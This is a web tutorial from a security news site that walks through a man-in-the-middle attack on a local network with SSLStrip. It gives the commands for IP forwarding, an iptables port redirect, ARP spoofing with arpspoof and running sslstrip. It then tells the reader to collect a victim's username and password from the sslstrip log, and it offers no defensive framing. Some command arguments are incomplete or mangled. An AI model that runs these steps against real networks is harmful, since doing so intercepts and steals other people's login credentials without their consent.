Thursday, December 5, 2024
HomeSniffing & SpoofingMITM attack over HTTPS connection with SSLStrip

MITM attack over HTTPS connection with SSLStrip

Published on

SIEM as a Service

MITM attack with SSLStrip transparently hijack HTTP traffic on a network, look for HTTPS links and redirects, then map those connections into either resembles the other alike HTTP connections or homograph-comparable HTTPS links.

It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Also Read: Top 5 Best Android Hacking Apps 2017

- Advertisement - SIEM as a Service

Step 1: We should set our machine in forwarding mode so that our machine has the capacity to forward each packet that was not expected for your machine.

echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Need to set iptables to redirect traffic from port 80 to port 8080 to ensure outgoing connections to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Step 3: Need to find our Network Gateway.

route -n

MITM attack over HTTPS connection with SSLStrip

Step 4: Next we need to find our target machine’s IP address

MITM attack over HTTPS connection with SSLStrip

Step 5: ARP spoofing is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network.

arpspoof -i -t

MITM attack over HTTPS connection with SSLStrip

Step6: Now we need to listen to port 8080, by opening a new terminal window.

sslstrip -l 8080

MITM attack over HTTPS connection with SSLStrip

Step 7: Now we should go to the victim machine and for Ex type facebook.com in the browser as we know Facebook will go with HTTPS, but now check with the victim machine, we can see the connection established through HTTP.

MITM attack over HTTPS connection with SSLStrip
MITM attack over HTTPS connection with SSLStrip

Step8: Now go to the Home folder and check for the sslstrip.log file, we can find the username and password the victim entered for login.

MITM attack over HTTPS connection with SSLStrip

That’s all we have cracked our victim’s credentials.

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

One Identity Named Winner of the Coveted Top InfoSec Innovator Awards for 2024

One Identity named Hot Company: Privileged Access Management (PAM) in 12th Cyber Defense Magazine’s...

HCL DevOps Deploy / Launch Vulnerability Let Embed arbitrary HTML tags

Recently identified by security researchers, a new vulnerability in HCL DevOps Deploy and HCL...

CISA Warns of Zyxel Firewalls, CyberPanel, North Grid, & ProjectSend Flaws Exploited in Wild

The Cybersecurity and Infrastructure Security Agency (CISA) has issued warnings about several vulnerabilities being...

HackSynth : Autonomous Pentesting Framework For Simulating Cyberattacks

HackSynth is an autonomous penetration testing agent that leverages Large Language Models (LLMs) to...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Tor Network Suffers IP Spoofing Attack Via Non-Exit Relays

In late October 2024, a coordinated IP spoofing attack targeted the Tor network, prompting...

10 Most Common Types of Cyber Attacks in 2023

Cyber attacks are evolving rapidly with advancements in technology, as threat actors exploit new...

Sniffing as easy as possible with Ettercap Tool

Sniffing includes catching, translating, inspecting, and interpreting the data inside a network packet on...